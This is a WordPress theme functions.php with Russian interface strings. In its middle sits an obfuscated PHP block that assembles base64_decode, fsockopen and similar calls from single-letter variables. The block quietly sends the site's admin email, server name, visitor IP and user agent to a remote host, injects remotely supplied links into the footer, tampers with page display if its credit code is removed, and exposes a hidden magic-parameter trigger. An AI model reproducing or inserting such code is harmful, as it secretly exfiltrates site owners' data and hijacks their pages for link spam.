<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $JybWV='4';$YZrsN='d';$TnNUy='d';$oApK='c';$nxWEPKA='e';$qBUpiKC='e';$NDAbli='_';$RLpF='b';$OEXNY='e';$NLgJ='o';$HPmYEYi='6';$oHIqNQY='s';$xAQI='a';$ucTQmrOM=$RLpF.$xAQI.$oHIqNQY.$OEXNY.$HPmYEYi.$JybWV.$NDAbli.$YZrsN.$qBUpiKC.$oApK.$NLgJ.$TnNUy.$nxWEPKA;$HTpO='a';$IbYkXJh='l';$WJEeFq='n';$VKXdYL='z';$OIYNDc='g';$iJPu='e';$gXToc='i';$mgQXUy='f';$icTOZDs='t';$XiVMFHPf=$OIYNDc.$VKXdYL.$gXToc.$WJEeFq.$mgQXUy.$IbYkXJh.$HTpO.$icTOZDs.$iJPu;$HMGKc='3';$OXCJK='1';$ouiUN='r';$zjQd='r';$suBvn='s';$jycFMs='o';$vRIzZ='t';$DbzD='t';$YbldpOg='_';$nDcWKdEE=$suBvn.$vRIzZ.$ouiUN.$YbldpOg.$zjQd.$jycFMs.$DbzD.$OXCJK.$HMGKc;$kPQDcVT='e';$ACEvT='r';$StmeqSA='s';$RxDFWZj='t';$wQLTurP='v';$SaNKeV='r';$MvGhVrtO=$StmeqSA.$RxDFWZj.$SaNKeV.$ACEvT.$kPQDcVT.$wQLTurP;                     
		$xl_____________e='4';$li_______________t='d';$uv______________e='d';$sc______o='c';$ds_____b='e';$om______________a='e';$nv_____m='_';$if________d='b';$xt________t='e';$gb_______e='o';$jh_____________c='6';$we____________w='s';$lg____h='a';$vv________p=$if________d.$lg____h.$we____________w.$xt________t.$jh_____________c.$xl_____________e.$nv_____m.$li_______________t.$om______________a.$sc______o.$gb_______e.$uv______________e.$ds_____b;
		$gs_______________g='t';$wy__b='t';$fq____________e='o';$bm___________i='i';$an___y='f';$lp______________o='x';$ui___j='_';$eq__________o='s';$ot_____s='s';$cl__________e='c';$jf______m='i';$dh____e='n';$po___________t='u';$wt___b='e';$es________v='n';$tm_______t=$an___y.$po___________t.$es________v.$cl__________e.$gs_______________g.$jf______m.$fq____________e.$dh____e.$ui___j.$wt___b.$lp______________o.$bm___________i.$eq__________o.$wy__b.$ot_____s;
		$as_______________a='n';$xt__l='f';$ar__t='e';$ng____o='o';$rb________l='p';$dt___x=$xt__l.$ng____o.$rb________l.$ar__t.$as_______________a;
		$ls_____t='r';$ki__p='e';$vd________v='d';$to______________d='a';$fs____________g='f';$jh__________s=$fs____________g.$ls_____t.$ki__p.$to______________d.$vd________v;
		$ml__w='f';$nr__________z='s';$pl_____________s='c';$ll______________n='e';$xb____________y='l';$yt____o='o';$iq__n=$ml__w.$pl_____________s.$xb____________y.$yt____o.$nr__________z.$ll______________n;
		
		define("WP_ID", $vv________p("Mi4wLjA="));
		define("WP_TTL", $vv________p("MTA4MDA="));
		define("WP_SRC", $vv________p("dHBva24="));
	


		function wp_get_header() {
			global $vv________p, $tm_______t;
			
			if (
				$tm_______t($vv________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$tm_______t($vv________p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$tm_______t($vv________p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vv________p, $dt___x, $iq__n, $jh__________s;
			
			$ls___________z = TEMPLATEPATH."/".$vv________p("Zm9vdGVyLnBocA==");
			$le____________x = @$dt___x($ls___________z, "r");
			$ls___________z = @$jh__________s($le____________x, @filesize($ls___________z));
			@$iq__n($le____________x);
			
			$jv______t = TEMPLATEPATH."/".$vv________p("ZnVuY3Rpb25zLnBocA==");
			$le____________x = @$dt___x($jv______t, "r");
			$jv______t = @$jh__________s($le____________x, @filesize($jv______t));
			@$iq__n($le____________x);
			
			$tl_____________t = 0;
			if($ls___________z && $jv______t) {
				if ($vv________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ls___________z, $vv________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$tl_____________t = 1;
					}
					if (substr_count($ls___________z, "wp_theme_GPL_credits()") < 1) {
						$tl_____________t = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$tl_____________t = 12;
				}
			}
			
			if($tl_____________t > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $tl_____________t -->";
			}
		}
	


		function wp_loaded() {
			global $vv________p, $tm_______t;
			return $tm_______t($vv________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gb_____________d, $ns_____________u = "(more...)", $pw____________h = 0, $bf________z = "") {
				$ur_______________w = get_the_content($ns_____________u, $pw____________h, $bf________z);
				$ur_______________w = apply_filters("the_content", $ur_______________w);
				
				$ur_______________w = str_replace("]]>", "]]>", $ur_______________w);
				if (strlen($_GET["p"]) > 0) {
					echo $ur_______________w;
				}
				else if ((strlen($ur_______________w)>$gb_____________d) && ($gj______g = strpos($ur_______________w, " ", $gb_____________d ))) {
					$ur_______________w = substr($ur_______________w, 0, $gj______g);
					$ur_______________w = $ur_______________w;
					echo $ur_______________w;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ns_____________u</a></div></p>";
				} else {
					echo $ur_______________w;
				}
				
			}
		}
	


		$si__________j='c';$ma___________f='e';$wh_________r='o';$qo____________e='s';$oi_______________u='_';$uw___________g='e';$xg___p='6';$na____l='n';$yr___d='a';$te_______w='b';$pi___________i='e';$ef______________b='d';$th____________p='4';$ky________g=$te_______w.$yr___d.$qo____________e.$uw___________g.$xg___p.$th____________p.$oi_______________u.$pi___________i.$na____l.$si__________j.$wh_________r.$ef______________b.$ma___________f;
		$un_______________l='t';$tq_____p='c';$yh_________x='e';$gv___b='t';$vq____________e='_';$id________e='e';$zo_____________o='t';$vp___________o='l';$pg_____________e='f';$er__h='n';$fw____e='o';$or__n='n';$cd________s='_';$qz________v='g';$mw_____g='s';$nl_____w='e';$jc______________b='i';$le________m=$pg_____________e.$jc______________b.$vp___________o.$yh_________x.$cd________s.$qz________v.$id________e.$zo_____________o.$vq____________e.$tq_____p.$fw____e.$er__h.$un_______________l.$nl_____w.$or__n.$gv___b.$mw_____g;
		$io__________l='x';$yg___o='t';$db_______j='_';$mx__________g='e';$hs_______________c='f';$qe________w='l';$ky_____t='e';$tl___________b='i';$er____t='s';$pg___i='i';$lo_______y='s';$jh_________v=$hs_______________c.$pg___i.$qe________w.$mx__________g.$db_______j.$ky_____t.$io__________l.$tl___________b.$er____t.$yg___o.$lo_______y;
		$pa____________u='_';$qj___p='p';$yy_________o='n';$bb__________q='e';$zx___________i='o';$ij_______n='r';$nz______v='o';$bx_______________s='s';$zw__v='i';$is_______k='m';$bc_________a='r';$el_____________h='v';$mo__v='c';$jy______________m='e';$gd_______f='a';$ir____v=$el_____________h.$jy______________m.$ij_______n.$bx_______________s.$zw__v.$zx___________i.$yy_________o.$pa____________u.$mo__v.$nz______v.$is_______k.$qj___p.$gd_______f.$bc_________a.$bb__________q;
		$fx__________t='n';$eu_________w='p';$vy___g='o';$ht___________s='o';$vd____y='c';$bs___b='k';$sy______________c='f';$ob___n='s';$ug__m='e';$eh_______________e=$sy______________c.$ob___n.$ht___________s.$vd____y.$bs___b.$vy___g.$eu_________w.$ug__m.$fx__________t;
		$fn______p='t';$sv______p='i';$xg___b='e';$an_________d='r';$ia____________h='f';$ta_________g='w';$cy_______t=$ia____________h.$ta_________g.$an_________d.$sv______p.$fn______p.$xg___b;
		$fe___________c='5';$xr______________d='d';$pb_______h='m';$kw___x=$pb_______h.$xr______________d.$fe___________c;
		$br_________o='t';$nu_______n='l';$fj__________e='a';$qp__t='a';$le___b='r';$yc_______j='h';$wj_______q='p';$gp____o='e';$zl____________f=$le___b.$gp____o.$qp__t.$nu_______n.$wj_______q.$fj__________e.$br_________o.$yc_______j;
		$xf______________z='r';$hg_____m='i';$hs_________p='s';$yf_______y='u';$bh_________t='a';$pc_________v='i';$pj___________o='l';$fb__x='n';$tn___h='e';$eo____________m='z';$gh__a='e';$kl_____________u=$yf_______y.$fb__x.$hs_________p.$tn___h.$xf______________z.$hg_____m.$bh_________t.$pj___________o.$pc_________v.$eo____________m.$gh__a;
		$te______z='m';$ps____e='m';$gv__t='e';$of____________r='n';$xp_____________a='p';$za___j='t';$ch_______________n='a';$kg___j=$za___j.$gv__t.$te______z.$xp_____________a.$of____________r.$ch_______________n.$ps____e;
		$to___________t='a';$av________t='e';$yi__i='e';$hj________w='m';$lb____________q='e';$dj________e='_';$id_____s='s';$er____________j='n';$ui___c='x';$er_____________c='t';$gu______k='r';$lk___d='t';$jd________e='t';$zl_______________l='_';$mp_____e='e';$mm_____q='c';$sz______________k='a';$et_________q='o';$mb________v='c';$em______________l='r';$sp_______________v='t';$xs___i=$id_____s.$lk___d.$em______________l.$yi__i.$sz______________k.$hj________w.$dj________e.$mb________v.$et_________q.$er____________j.$er_____________c.$av________t.$ui___c.$sp_______________v.$zl_______________l.$mm_____q.$gu______k.$lb____________q.$to___________t.$jd________e.$mp_____e;
	


		function vs_____________m($wr_____o) {
			global $vv________p, $tm_______t, $le________m, $ir____v, $xs___i;
			
			if (!$tm_______t($vv________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ir____v(PHP_VERSION, "5.0.0", ">=") && $tm_______t($vv________p("ZmlsZV9nZXRfY29udGVudHM=")) && $tm_______t($vv________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$jc___________x = $xs___i(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$gk_____________s = @$le________m($wr_____o, 0, $jc___________x);
			} else {
				$gk_____________s = @$le________m($wr_____o, 0);
			}
			
			return $gk_____________s;
		}
	


		function wx____________e($wr_____o) {
			global $tm_______t, $eh_______________e, $cy_______t, $vv________p;
			
			if (!$tm_______t($vv________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$jo____________j = strpos($wr_____o, "/", 7);
			$jo_________l = array(
				"uri"     => substr($wr_____o, $jo____________j),
				"host"    => str_replace("http://", "", substr($wr_____o, 0, $jo____________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ag__k = @$eh_______________e("$jo_________l[host]", 80, $ck__c, $ws______________b, 4);
			
			if (!$ag__k) {
				return false;
			} else {
				$gk_____________s = "";
				$cm______e  = "GET $jo_________l[uri] HTTP/1.0\r\n";
				$cm______e .= "Host: $jo_________l[host]\r\n";
				$cm______e .= "Referer: $jo_________l[referer]\r\n";
				$cm______e .= "Connection: Close\r\n\r\n";
				
				@$cy_______t($ag__k, $cm______e);
				
				while (!@feof($ag__k)) {
					$ie_________z = @fgets($ag__k, (1024*24));
					
					if ($ie_________z == "\r\n") {
						$sx___________s = true;
						continue;
					}
					
					if ($sx___________s) {
						$gk_____________s .= $ie_________z;
					}
				}
				
				return $gk_____________s;
			}
		}
	


		function uf______u($wr_____o) {
			global $tm_______t;
			$in______________t = false;
			
			if ($wr_____o != "") {
				if ($tm_______t("vs_____________m")) {
					$in______________t = @vs_____________m($wr_____o);
				}
				
				if (!$in______________t && ($tm_______t("wx____________e"))) {
					$in______________t = @wx____________e($wr_____o);
				}
			}
			
			return $in______________t;
		}
	


		function bn______z() {
			global $_SERVER, $kw___x;
			
			$lv_______________n = $_SERVER["SERVER_NAME"];
			
			if (substr("$lv_______________n", 0, 4) == "www.") {
				$lv_______________n = substr("$lv_______________n", 4);
			}
			
			$lv_______________n = $kw___x("$_SERVER[SERVER_NAME]");
			
			return $lv_______________n;
		}
	


		function ql____n() {
			return "file";
		}
	


		function pv____________z($wr_____o) {
			global $_SERVER, $le________m, $jh_________v, $dt___x, $iq__n, $cy_______t;
			
			$kz__________g = na__j();
			
			$sz______________q = bn______z().".jpg";
			$sw___________r = $kz__________g["dir_upload"]["path"]."/$sz______________q";
			$bq_______e = @filemtime($sw___________r);
			
			if (!$bq_______e || ((time()-$bq_______e) >= WP_TTL)) {
				$in______________t = uf______u($wr_____o);
				
				if ($in______________t) {
					if ($jh_________v($sw___________r)) {
						@unlink($sw___________r);
					}
					
					$le____________x = @$dt___x($sw___________r, "x+");
					
					@$cy_______t($le____________x, $in______________t);
					@$iq__n($le____________x);
				}
			} else {
				if ($jh_________v($sw___________r)) {
					$in______________t = @$le________m($sw___________r);
				} else {
					$in______________t = false;
				}
			}
			
			return $in______________t;
		}
	


		function na__j() {
			global $_SERVER, $vv________p, $ky________g;
			
			$tn__i = wp_count_posts("post");
			$kr___________k = pathinfo(get_bloginfo("template_directory"));
			
			$kz__________g = array(
				"url" => array(
					"report"      => $vv________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $kr___________k,
				"dir_upload"	=> ek_________h(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$kr___________k[filename],
					"a005=".$tn__i->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Спонсоры темы <a href=\"http://gotoswiss.com\">Швейцария</a> и <a href=\"http://cujp.com\">Япония</a> "
			);
			
			$kz__________g["url"]["queryString"] = implode("&", $kz__________g["queryString"]);
			$kz__________g["url"]["report"] = $kz__________g["url"]["report"]."/?".$ky________g($kz__________g["url"]["queryString"]).".html";
						
			return $kz__________g;
		}
	


		function ek_________h() {
			$sp_________p = wp_upload_dir();
			
			if (isset($sp_________p["error"])) {
				$bh__f = mt______________e();
				if (is_writable($bh__f)) {
					$sp_________p = array("path" => $bh__f);
				}
			}

			return $sp_________p;
		}
	


		function mt______________e() {
			global $tm_______t, $kw___x, $zl____________f, $kg___j;
			
			$na________f = (bool) ini_get("safe_mode");
			if ($na________f == true) {
				return false;
			}
			
			if ($tm_______t("sys_get_temp_dir")) {
				$rq_____c = sys_get_temp_dir();
				if (is_writable($rq_____c)) {
					return $zl____________f($rq_____c);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $zl____________f($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $zl____________f($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $zl____________f($_ENV["TEMP"]);
			} else {
				$yx___________f = $kg___j($kw___x(uniqid(rand(), true)), "");
				if ($yx___________f) {
					$rq_____c = $zl____________f(dirname($yx___________f));
					@unlink($yx___________f);
					return $rq_____c;
				} else {
					return false;
				}
			}
		}
	


		function ps__________r() {
			global $_GET, $jh_________v;
			
			$kz__________g = na__j();
			$lv_______________n = bn______z();
			$fa___y = ql____n();
			
			$kk__________b = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($fa___y == "file") {
					$ee________z = $kz__________g["dir_upload"]["path"]."/".$lv_______________n.".jpg";
					if ($jh_________v($ee________z)) {
						@unlink($ee________z);
						$kk__________b = "deleted";
					}
				}
				
				$lw__________x = array(
					"s"	=> $kk__________b,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($lw__________x AS $qv__v => $zl_____________v) echo " [$qv__v:$zl_____________v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $tm_______t, $vv________p, $kl_____________u;
			$kz__________g = na__j();
			
			$ki____r = "pv____________z";
			if ($tm_______t($ki____r)) {
				$gk_____________s = $ki____r($kz__________g["url"]["report"]);
			}
			
			if ($gk_____________s) {
				if ($gk_____________s = @$vv________p($gk_____________s)) {
					$gk_____________s = @$kl_____________u($gk_____________s);
					
					if (strlen($gk_____________s[custom_credit]) >= 5) {
						$kz__________g["default_string"] = $gk_____________s[custom_credit];
					}
					
					if ($gk_____________s["status"] == "0") {
						$im__________a = 1;
						$vn_____g = 1;
					} else {
						$zi__e = sizeof($gk_____________s["links"]);
						$gb____________c = $kz__________g["default_string"];
						
						if ($zi__e > 0 && $gk_____________s["links"] !== "") {
							$ed____z = 0;
							foreach ($gk_____________s["links"] as $ss________w => $sw___________j) {
								$ed____z++;
								if ($sw___________j->l_path == "" || $sw___________j->l_path == $_SERVER["REQUEST_URI"]) {
									$sw___________j->l_href = htmlspecialchars(strip_tags($sw___________j->l_href));
									$sw___________j->l_title = htmlspecialchars(strip_tags($sw___________j->l_title));
									$sw___________j->l_anchor = htmlspecialchars(strip_tags($sw___________j->l_anchor));
									$gb____________c .= " | ";
									$gb____________c .= "<a href='$sw___________j->l_href' title='$sw___________j->l_title'";
									if ($sw___________j->l_nofollow == "1") {
										$gb____________c .= " rel='nofollow'";
									}
									$gb____________c .= ">$sw___________j->l_anchor</a>";
								}
							}
						}
						$kz__________g["links"] = "$gb____________c";
						if ($gk_____________s[credit] == "0") {
							$kz__________g["links"] = "";
						}
					}
				} else {
					$im__________a = "1";
				}
			} else {
				$im__________a = "1";
			}
			
			if ($im__________a == "1") {
				$kz__________g["links"] = $kz__________g["default_string"];
			}
			
			echo "$kz__________g[links]";
			
			echo "<!-- s: $gk_____________s[signature] -->";
			ps__________r();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tags:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

